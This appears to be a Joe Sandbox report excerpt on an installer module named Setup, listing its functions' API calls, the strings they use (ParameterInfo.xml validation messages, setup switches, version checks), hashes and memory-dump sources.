                                                              • Instruction ID: 83cfe4ec047d326aa8939f92f0ac07b38ae11ea5b70e3f2150cafa35f1c0631e
                                                              • Opcode Fuzzy Hash: 66c74831d878da533e0a1741a8ee8248ffabdd969db1dbb8d3853d11964c0ca9
                                                              • Instruction Fuzzy Hash: 6D4125B2A00259DBCB10DFE8C946BDEBBB5BF25304F504459E814FBA50C730DA89CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92A833
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92AD1D
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: <$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$IsPresent$MSIOptions$MSIRepairOptions$MSIUninstallOptions$ParameterInfo.xml$ProductCode$RepairOverride$UninstallOverride$schema validation failure: MSI, AgileMSI and AgileMSP do not support RepairOverride or UninstallOverride child elements!$schema validation failure: Product Code cannot be emoty.$schema validation failure: wrong number of MSI child nodes!
                                                              • API String ID: 2489616738-1903366528
                                                              • Opcode ID: d68872f05106b5a561814dbad5713a9a15e81ee0a7a4b6c08587795fbc279a7e
                                                              • Instruction ID: 8c4865a1099b6800323b64b352f2763e2403bf18dcf6549dc2d11c418ba44369
                                                              • Opcode Fuzzy Hash: d68872f05106b5a561814dbad5713a9a15e81ee0a7a4b6c08587795fbc279a7e
                                                              • Instruction Fuzzy Hash: B1428471A14249EFDB04CFA8C944ADE7BB9BF19318F148549F864EBB80CB34DA05CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932589
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C932AB0
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C0F9
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C113
                                                                • Part of subcall function 6C96C0AA: __CxxThrowException@8.LIBCMT ref: 6C96C124
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throwstd::exception::exception$_malloc
                                                              • String ID: ", local path $". Valid types are MSI, MSP, Exe, Patches, ServiceControl and File. Theses are case sensitive.$(not applicable)$Adding Item type "$AgileMSI$CleanupBlock$Exe$File$MSI$MSP$ParameterInfo.xml$Patches$RelatedProducts$ServiceControl$Unknown Item type "$schema validation failure: unknown Item type -
                                                              • API String ID: 3439882596-1328758535
                                                              • Opcode ID: ed22f2608e8be473e1aa2a94d443d54adc919e25acc978388ea31001176d059c
                                                              • Instruction ID: e780737fc14b1e92c26e252e4aecd29801f2fe00a3645b2c63d8cb93dd798c67
                                                              • Opcode Fuzzy Hash: ed22f2608e8be473e1aa2a94d443d54adc919e25acc978388ea31001176d059c
                                                              • Instruction Fuzzy Hash: 4B02A271905618EFDF04DBE8C944AED7BF8AF29318F10455AF419E7B85CB30DA088BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48BE0A
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C49F35E: __EH_prolog3.LIBCMT ref: 6C49F365
                                                                • Part of subcall function 6C49F35E: __recalloc.LIBCMT ref: 6C49F3A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                              • API String ID: 1900422986-634121796
                                                              • Opcode ID: 01a773d90959effd4bf181e75f3aa6db94566fa14e55c361f2361abac2ddf48e
                                                              • Instruction ID: 773c6ceae71cc3bbb8abadaf76c505962a293e6ff01eccb4e8773c354f724658
                                                              • Opcode Fuzzy Hash: 01a773d90959effd4bf181e75f3aa6db94566fa14e55c361f2361abac2ddf48e
                                                              • Instruction Fuzzy Hash: 36A12EB18011AD9EEB10D7E8C884FEDBBB4AF1531CF18059CE024A3785D775A64D9BB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C949067: __EH_prolog3.LIBCMT ref: 6C94906E
                                                                • Part of subcall function 6C949067: __recalloc.LIBCMT ref: 6C9490B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                              • API String ID: 1900422986-634121796
                                                              • Opcode ID: 47b4e783487af36b9a71cffe86ce2044a380737a482de4b59f9216fbf665270d
                                                              • Instruction ID: ae2a90210aae0625c35df758456201c6df667df2cbf2d875a795894df2f3aee3
                                                              • Opcode Fuzzy Hash: 47b4e783487af36b9a71cffe86ce2044a380737a482de4b59f9216fbf665270d
                                                              • Instruction Fuzzy Hash: E191E63140428CEADB04DBB8CA44BCC77A9AF31368F54C646E8249BF81C775DB1C9766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8FreeStringThrow_malloc
                                                              • String ID: can only have one logical or arithmietic expression for a child node$AlwaysTrue$And$Equals$Exists$GreaterThan$GreaterThanOrEqualTo$LessThan$LessThanOrEqualTo$NeverTrue$Not$ParameterInfo.xml$schema validation failure: $schema validation failure: unknown Expression:
                                                              • API String ID: 1924927865-100526994
                                                              • Opcode ID: 097367455a372fdbc5bb2e0720ba37fec1d4836a6d9c3d6ad28112d1cbb52b87
                                                              • Instruction ID: 1d7584feb37a6ec9411aa35e422a536ec5a4381d9ee90c6c7ec05b3d01e977e4
                                                              • Opcode Fuzzy Hash: 097367455a372fdbc5bb2e0720ba37fec1d4836a6d9c3d6ad28112d1cbb52b87
                                                              • Instruction Fuzzy Hash: E102D0711083419FE704CFA8C840B9EB7ECAFA6358F144A5EF495C7B85DB35D9088766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4961A0
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C491E75: __EH_prolog3.LIBCMT ref: 6C491E7C
                                                                • Part of subcall function 6C491E75: GetThreadLocale.KERNEL32(?,00000004,6C496734,LBqIl,0000004C,6C497142,?,00000000), ref: 6C491E8E
                                                              • PathIsRelativeW.SHLWAPI(?,?,?,0000003C,6C4A7332,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6C4961E9
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C4961F6
                                                              • PathFileExistsW.SHLWAPI(?,?), ref: 6C49622B
                                                              • PathFileExistsW.SHLWAPI(?), ref: 6C496230
                                                              • CoInitialize.OLE32(00000000), ref: 6C496299
                                                              • CoUninitialize.OLE32(?,?), ref: 6C496340
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4963B7
                                                              • __EH_prolog3.LIBCMT ref: 6C4963C9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Path$ExistsFile$Exception@8InitializeLocaleRelativeThreadThrowUninitialize
                                                              • String ID: ' was not found in UiInfo.xml$String for StringID '$Strings$Strings.xml$Successfuly found file %s $UIInfo.xml
                                                              • API String ID: 1923347782-1246989722
                                                              • Opcode ID: 317611c827b8afc51fde3719d638d84a2d5c61edf2b19096c878f19466aedbbc
                                                              • Instruction ID: 915e0dc4a83f4db1136fe0bd9878e2ae956160ccaf799d029deea67ed6d838d6
                                                              • Opcode Fuzzy Hash: 317611c827b8afc51fde3719d638d84a2d5c61edf2b19096c878f19466aedbbc
                                                              • Instruction Fuzzy Hash: 07A15C71901149EFDB00DBE8C985FDEBBB8AF05318F148159E524EB791DB30DA0ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C950C9B
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000029C,6C94A587,?,6C90A794,?,02642228,?,00000000,?,Failed to record current state name), ref: 6C950CAD
                                                              • GetLastError.KERNEL32(?,Failed to record OSFullBuildNumber), ref: 6C950CCC
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C950D21
                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C950DB2
                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record OSAbbr,?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 6C950E38
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3$H_prolog3_HandleInfoModuleNativeSystem
                                                              • String ID: Failed to record OSAbbr$Failed to record OSComplete$Failed to record OSFullBuildNumber$Failed to record OsSpLevel$Failed to record SystemLocale$Failed to record WindowsInstallerVersion$GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 684166175-3561000745
                                                              • Opcode ID: 07d124d53f5d9bd72feb33a85791c9da8e02ca87e9d9958342f84f34c3eb1c31
                                                              • Instruction ID: a718e8518b29ec978d140b570706906b4ec51d45091404509f5580c0a9d94780
                                                              • Opcode Fuzzy Hash: 07d124d53f5d9bd72feb33a85791c9da8e02ca87e9d9958342f84f34c3eb1c31
                                                              • Instruction Fuzzy Hash: 1DA1C431A00659AFDB20DBB4CD08BD9B7B9AFA530CF1045D4E404E7B80DB74EA99CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49D150
                                                                • Part of subcall function 6C48C419: __EH_prolog3.LIBCMT ref: 6C48C420
                                                                • Part of subcall function 6C48C419: GetModuleFileNameW.KERNEL32(6C480000,00000010,00000104), ref: 6C48C46D
                                                                • Part of subcall function 6C49F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6C48C3AE), ref: 6C49F241
                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D198
                                                              • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6C49D1AF
                                                              • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D1E4
                                                              • GetDlgItem.USER32(?,00000068), ref: 6C49D1F5
                                                              • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6C49D209
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D231
                                                              • GetDlgItem.USER32(?,00000069), ref: 6C49D242
                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6C49D256
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D27E
                                                              • GetDlgItem.USER32(?,0000006A), ref: 6C49D28F
                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6C49D2A3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ImageLoadMessageSend$Item$H_prolog3$AppendFileModuleNamePath
                                                              • String ID: graphics\setup.ico$print.ico$save.ico$stop.ico$warn.ico
                                                              • API String ID: 1194837009-3827646805
                                                              • Opcode ID: c2bade2f38b08ec7935ef65a77e8a16ffb001f049268242b9c5a415681574e71
                                                              • Instruction ID: 2e54154ba6fbb2ec4c19917d84c2702bf84b9aa7a2eef35b84496e2660795ad3
                                                              • Opcode Fuzzy Hash: c2bade2f38b08ec7935ef65a77e8a16ffb001f049268242b9c5a415681574e71
                                                              • Instruction Fuzzy Hash: 0D41553074171AAEFF20DBA0CC46FEA7BB9BF05705F000819F265A95D0CBB2E4549B11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9287B7
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                                • Part of subcall function 6C9195C1: __EH_prolog3.LIBCMT ref: 6C9195C8
                                                                • Part of subcall function 6C9195C1: VariantInit.OLEAUT32(?), ref: 6C9195DB
                                                                • Part of subcall function 6C9195C1: SysFreeString.OLEAUT32(?), ref: 6C91960E
                                                                • Part of subcall function 6C9195C1: VariantClear.OLEAUT32(00000008), ref: 6C91962E
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C928D0A
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8ThrowVariant$ClearDispatcherExceptionFreeInitStringUser
                                                              • String ID: 1$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$Exe$InstallCommandLine$IsPresent$LogFileHint$ParameterInfo.xml$RepairCommandLine$UninstallCommandLine$schema validation failure: wrong number of EXE child nodes!
                                                              • API String ID: 1022868530-2895508641
                                                              • Opcode ID: aeb6f09b79ee5cefa7e804d9e17a533aac9df4a29847427ea26ad9291d5709c9
                                                              • Instruction ID: 65a87636faf8e65f8ce43f7701e55b53c1529f2958ba9fd77cd7bfebb2c3f13b
                                                              • Opcode Fuzzy Hash: aeb6f09b79ee5cefa7e804d9e17a533aac9df4a29847427ea26ad9291d5709c9
                                                              • Instruction Fuzzy Hash: 0A323C71A14249EFDB04DFA8C944ADDBBB9BF29308F148559F824EBB80C734DA05CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              • GetCommandLineW.KERNEL32(512AC3CC,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C959D54
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                              • __CxxThrowException@8.LIBCMT ref: 6C959EBD
                                                              Strings
                                                              • lower, xrefs: 6C959FFA
                                                              • higher, xrefs: 6C95A001, 6C95A017
                                                              • SetupVersion not specified, xrefs: 6C959E1F
                                                              • SetupVersion specified in ParameterInfo.xml is , xrefs: 6C95A029
                                                              • Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check., xrefs: 6C959D95
                                                              • Current SetupVersion = %s, xrefs: 6C959D43
                                                              • SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version., xrefs: 6C959F44
                                                              • than the currently supported version., xrefs: 6C95A006
                                                              • SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version., xrefs: 6C959F58
                                                              • ParameterInfo.xml, xrefs: 6C959E2E, 6C959F67, 6C95A096
                                                              • 1.0, xrefs: 6C959D3D, 6C959D42, 6C959ED4, 6C959EFB
                                                              • SetupVersion specified in ParameterInfo.xml is '%s', xrefs: 6C959EC3
                                                              • NoSetupVersionCheck, xrefs: 6C959D6C
                                                              • SetupVersion, xrefs: 6C959DC0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandException@8LineThrow
                                                              • String ID: than the currently supported version.$1.0$Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check.$Current SetupVersion = %s$NoSetupVersionCheck$ParameterInfo.xml$SetupVersion$SetupVersion not specified$SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version.$SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version.$SetupVersion specified in ParameterInfo.xml is $SetupVersion specified in ParameterInfo.xml is '%s'$higher$lower
                                                              • API String ID: 1129948358-1674238012
                                                              • Opcode ID: 7b41c9a092c94d4b99411f9c4e4b58637ed58a99c49116cf8231428bcbd857ee
                                                              • Instruction ID: 5e6eb1e9faaf4ba4f84b463cd1f64826e8cbb10e126f90d236820380c67e5f51
                                                              • Opcode Fuzzy Hash: 7b41c9a092c94d4b99411f9c4e4b58637ed58a99c49116cf8231428bcbd857ee
                                                              • Instruction Fuzzy Hash: 33C17E725087809FD314DB78C840B9FBBE8AFA6358F144A1DF1A1C7B91DB34D9098B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C929851
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C0F9
                                                                • Part of subcall function 6C96C0AA: std::exception::exception.LIBCMT ref: 6C96C113
                                                                • Part of subcall function 6C96C0AA: __CxxThrowException@8.LIBCMT ref: 6C96C124
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C918AAC: __EH_prolog3.LIBCMT ref: 6C918AB3
                                                                • Part of subcall function 6C918AAC: __CxxThrowException@8.LIBCMT ref: 6C918B39
                                                                • Part of subcall function 6C918D44: __EH_prolog3.LIBCMT ref: 6C918D4B
                                                                • Part of subcall function 6C92784C: __EH_prolog3.LIBCMT ref: 6C927853
                                                                • Part of subcall function 6C918D44: __CxxThrowException@8.LIBCMT ref: 6C918EFD
                                                                • Part of subcall function 6C921D3D: __EH_prolog3.LIBCMT ref: 6C921D44
                                                                • Part of subcall function 6C921D3D: __CxxThrowException@8.LIBCMT ref: 6C921E11
                                                                • Part of subcall function 6C921C2E: __EH_prolog3.LIBCMT ref: 6C921C35
                                                                • Part of subcall function 6C921C2E: __CxxThrowException@8.LIBCMT ref: 6C921D02
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C92A060
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$std::exception::exception$DispatcherExceptionUser_malloc
                                                              • String ID: $<$A helper with this name already exists. All helper names must be unique. : $ActionTable$ApplicableIf$Cannot create the helper item: $CommandLine$InstalledProductSize$IsPresent$Name$ParameterInfo.xml$Patches$SystemDriveSize
                                                              • API String ID: 2177076360-1307745120
                                                              • Opcode ID: aadbb837fae04275e1fe7195d591f9a2be74f9de6059a96ecb36a25c43fb7837
                                                              • Instruction ID: 7792083b81f1611943f615fed0b1d43c8fc74607001c4fc06d2dccfd58d1ff74
                                                              • Opcode Fuzzy Hash: aadbb837fae04275e1fe7195d591f9a2be74f9de6059a96ecb36a25c43fb7837
                                                              • Instruction Fuzzy Hash: F7525971D11209EFDB00CFE8C944BEEBBB8AF19318F204159E454BBA94D774DA09DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
